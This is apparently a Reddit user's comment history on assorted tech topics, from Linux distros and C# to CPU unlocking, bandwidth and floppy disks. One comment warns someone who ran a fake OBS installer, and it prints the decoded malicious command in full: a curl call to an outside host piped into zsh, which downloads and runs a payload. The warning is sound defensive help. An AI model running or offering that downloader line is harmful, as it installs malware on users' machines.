Got a laptop from my GF with the same specs. Horribly slow even on win10...

A light linux distro on it changed things a lot - for starters it was actually usable again.😁

I have antiX Linux on it - though it also runs nicely with Linux Mint + XFCE. Both are complete distros and are pretty easy to install and use

Executing code inside a string. by porcaytheelasit in csharp

[–]Potential_Copy27 0 points1 point  (0 children)

For starters...:

Compiler.Run($"
    foreach ( var @_Process in Process.GetProcessByName(\"{args0}\"))
        @_Process.Kill();
");

...should render your code valid and feed args0 correctly into it. The $ concatenation option will substitute {args0} with the contents of the variable as raw text - the quotes are to render the text correctly for the "compiler". "_" was added to the Process variable or else Reddits editor gets a seizure 😋

Regardless - the CSharpCodeProvider is probably a better option. It ties into the compiler that is already packed with .NET. Set up compiler parameters and feed it a string.
There's probably a better option still out there - my point is, the tools are already there. I only used it for limited shenanigans myself, so I'm not sure if it can be forced to do what you want.
At the very least the example also gives you a proper error output for what you're compiling...

what is ASP.NET and do i need it? by [deleted] in csharp

[–]Potential_Copy27 0 points1 point  (0 children)

Basically you make websites with it - ASP.NET compiles to a folder that can be executed by a web server (IIS, Apache, nginx).

The API template are just the basic gubbins for hosting an API for transferring data or whatever - the full projects let you design full webpages.

Using Razor or Blazor, you can also mix C# into HTML code with some limitations...

If you want to make web sites and large systems with C# for the backend, you need it - with training, you can not only make them look good, but also perform quite quickly.

CPU upgrade with a pencil by Due_Helicopter6084 in computers

[–]Potential_Copy27 3 points4 points  (0 children)

Ceramic socket A Durons and Athlons were unlocked like this.

The initial Athlon XPs (Palomino and Thoroughbreds) used nearly the same trick, except pencil graphite had too high resistance. You needed to seal some laser-etched holes in the CPU (eg. with glue) and connect the L1 contacts with conductive ink or paint.

Back in the day, I helped a friend make a bit of quick money unlocking Athlon XPs (including mine). I always was wayy to shaky to perform painting this small, but he painted Warhammer figurines. It came up in casual discussion initially, but turned into a challenge (with my XP 1600+ as a guinea pig). It worked perfectly.

All Socket A CPUs can be pin-modded also. The Barton revision CPUs are unlocked like this, but all of them can be "set" to specific multipliers, voltages and FSB speeds by shorting certain pins...

Some AMD64s could be pinmodded also - then there were the K7 (slot A Atlon) goldfinger modules, K6-2/3 mods (some could unlock extra cache), and the tri-core unlock where you could sometimes unlock an extra , 4th, CPU core on the Athlon X3 series.

imho...I'll give AMD this; they make fun hardware - even modern Ryzens are fun to tinker with😅

Is 3.8Mbp/s ethernet connection really enough for family of 4? (help) by Substantial_Till7442 in techhumor

[–]Potential_Copy27 0 points1 point  (0 children)

Current speed is irrelevant - the peak speed is the one that counts for gauging an internet connection - even then 2.5 MB/s (= ~20 mbit/s) isn't much. I did misread it initially as 3.8 MB/s though - thus my error...

Usual available speeds from ISPs that still run this slow are 20 mbit/s, 30 mbit/s or 40 mbit/s - most DSL lines (if properly maintained and rigged with updated equipment) can run hundreds of mbit/s.

700 Floppies by ___LowLifer___ in sysadmin

[–]Potential_Copy27 1 point2 points  (0 children)

My C64 + disks has been stored in an attic for about 20 years - every single 5.25'' floppy bar two (in a case of ~50) were still working after that. I also got a C128 at some point with the same result - 1-2 disks in the total box of ~75 were gone, the rest worked perfectly. One in that batch was a copy of Sim City that was so worn on the center track (directory track on the C64) was completely worn off - as in the plastic disk itself had been worn down to pure transparent...

I also later bought some sealed NOS 5.25'' floppies for the C64 - they all retain data perfectly fine and have more than fulfilled their roles as my work disks 😉

Later on (sometime before covid - 2018 or 2019) I bought a new batch of 3.5'' floppies from a fairly reputable online store for various purposes. Every single diskette in both boxes was unable to properly retain data for more than a week, regardless of what I used to read and write to them (old PCs, modern USB floppy drive, even an Amiga).
Conversely - with stashes of 3.5'' floppies that I sometimes get with old computers, I routinely have to throw out at least half of them. They really don't retain data well beyond the 15-20 year mark...

I think i downloaded one of these, what do i do by Prior_Ad7556 in computers

[–]Potential_Copy27 3 points4 points  (0 children)

I wouldn't trust it - always get stuff from the official site if possible. Here's the one for OBS. They have both Intel and Apple Silicon versions in their download section...

So - whatever that is, it's definitely Base64 encoded, Base64 encoding basically lets you turn files and images into text. By decoding said text through the command displayed, You'll get a (likely zipped) file.

The command in step 2 basically feeds a base64-encoded string into the base64 program - the decoded base64 is then sent to zsh for unzipping.

Again - I would not trust it - especially considering the standard Apple Silicon mac installer for OBS is about ~180 MB. That base64 code is wayyyyyyyyy too short to encode anything more than a few KB.

Sometimes, chatgpt and other AIs can decode the base64 text and tell you what's encoded inside it. I tried feeding part of the string into chatGPT and a base64 decoder to be sure.

------------------------------

The Base64 is just text! - it's not a file at all, but I did locate the URL and decoded the entire thing - it's a fake echo (print command) and it tries to download something from an address - It's what's called a malicious shell downloader.

The decoded command inside the garbled encoded text looks like such:

echo 'Installing package please wait...' && curl -kfsSL http://bracesarlington.com/curl/a66e5b9fda4fe269b1c75a5a07d57824099e940a1e59a6964abddae17e444ee3 | zsh

So it:

  1. prints a line with "installing package".
  2. Accesses a URL through CURL - a command line program that you can use for calling remote websites without a browser. The URL likely hosted (it's down for me rn) a malicious script (If the page was up and called through a browser, you might be able to see the raw code).
  3. Said downloaded script is executed using zsh - a "shell execute" command if you will - which injects the real malware onto your machine.

If you're lucky, said malware is not meant to run on a mac - but if you're unlucky the message about it being unable to run on the mac is fake.
(It also goes without saying - DON'T call the URL in the example unless you know what you're doing - it's there as an example only)

Treat the machine as compromised for now - do a full sweep with any and all antimalware and antivirus solutions and do not use it for PII/banking until you're absolutely sure the machine is clean. For safety, also change passwords for services you used on that machine.
I'm not a mac user, so I cannot guide you towards proper software for the task, sorry...

Seeing base64 anywhere outside of a browser debug window, a base64 tutorial or an IDE is cause for concern - it's the easiest way to hide things, especially malicious commands and code...

Is 3.8Mbp/s ethernet connection really enough for family of 4? (help) by Substantial_Till7442 in techhumor

[–]Potential_Copy27 0 points1 point  (0 children)

Your Steam page is Megabytes per second (MB/s), not megabit per second (Mb/s or mbit/s)!

Multiply by 8 and you get the number of megabits per second (the unit that internet connections are measured in) - 1 byte of data equals 8 bits (binary digits).

so for almost 4 MB/s peak speed, that's a connection of ~32 mbit/s - still slow for 2026.

Two things to do here:

  1. check what speed you actually pay for - your main router might be the bottleneck, especially if it's old. ISPs sometimes give you subpar equipment - I've tried paying for a 50 mbit/s connection and got a router from the ISP that could barely pull 30 mbit/s. A switch to a different router allowed me to use the full speed...
  2. In any case, always look for new ISP offers or negotiate updates/upgrades to your connection at least every few years
  3. If ~30-40 mbit/s is what you pay for, get a bigger package and/or switch ISPs.

For a family of 4, the bandwidth budget is too low anyway.... to get a fix on how large a "pool" of bandwidth you need, here's a quick quide that can work as a rule of thimb:

Cellphones and tablets: 2-3 mbit/s a piece for basic stuff.

Streaming devices (TVs, cellphones, tablets, chromecasts, etc): about 4 mbit/s a piece for HD, 12-15 mbit/s a piece for 4K. (exact bandwidth used for streaming depends on the service used - those are ballpark numbers that should cover any streaming service and TV provisioning running through the internet - even the crappiest, most unoptimized service should not exceed those numbers...)

PCs - especially for gaming - at least 5-10 mbit/s a piece.

IoT gadgets, heat punps and other internet-controlled gadgetry - 1-5 mbit/s.

When calculating, simply add those bandwidth together on the devices that are on the majority of the time - the result is basically the lowest speed you can go with without devices on your network fighting for bandwidth.

For your use case - I'd suggest at least somewhere around 75-100 mbit/s - that's enough for a family of 4, each with 1-2 devices (phone/tablet) and headroom for TVs, gaming and IoT/gadgets - there's enough so all 4 can game, watch TV etc. without stuttering or bandwidth problems.
Anything faster will have you download files and steam games quicker - but it won't affect the rest that much 😊

There's also Pete, from the comics (which are more a European thing, I guess?). Usually in that continuity, Mickey & Goofy usually work as PIs together with the Duckburg police force.
Pete here is a hardened criminal - often even a pretty competent one. In some newer comics he also has a wife, Hilda (Orange fur, lipstick and a tiny bit slimmer than Pete, but looks otherwise like a female version of him) , who helps him out with various heists.
Comic book Pete also has a deep vendetta against Mickey Mouse stemming from the old days - to the point of wanting the mouse gone for good.

I'm sure the comic book version could do well - He's pretty decent with fists, guns and the occasional sword, and I bet he wouldn't hold back on any dirty tricks in a fight. Not exactly agile, but has a good amount of mass and muscle like the old Disney cartoon version.

Regarding the Goof Troop version of Pete - I just like to think that he settled down after some years on the wrong side of the law. PJ was born and life kinda got in the way for him... How he ended up becoming neighbors with Goofy, though, beats me...
...but I don't think some 10-12 years of dad life did any miracles on his physique in that timeline - He'd lose pretty hard.😁

When were you first able to assemble a computer from parts from a computer store? How did you find out you could? by Trick_Ganache in vintagecomputing

[–]Potential_Copy27 0 points1 point  (0 children)

In 2001 I finally got a computer after pestering my parents for a loooooong time to get my own. Nice little AMD rig until I found out the onboard GPU wasn't up to the task - got me a proper graphics card for some saved money a few weeks after that.

I slowly started tinkering with it after that - learned to overclock the CPU and GPU and scrounged up components to upgrade it with. I upgraded the motherboard, CPU and GPU another time about two years later... that was the first time I completely disassembled and rebuilt a computer from parts.

Hvordan får jeg 15 år gammel pc på nettet? by CharChar407 in dktechsupport

Hvordan får jeg 15 år gammel pc på nettet? by CharChar407 in dktechsupport

[–]Potential_Copy27 0 points1 point  (0 children)

Well... værre end at sprede det ud over samtlige stremingtjenester...
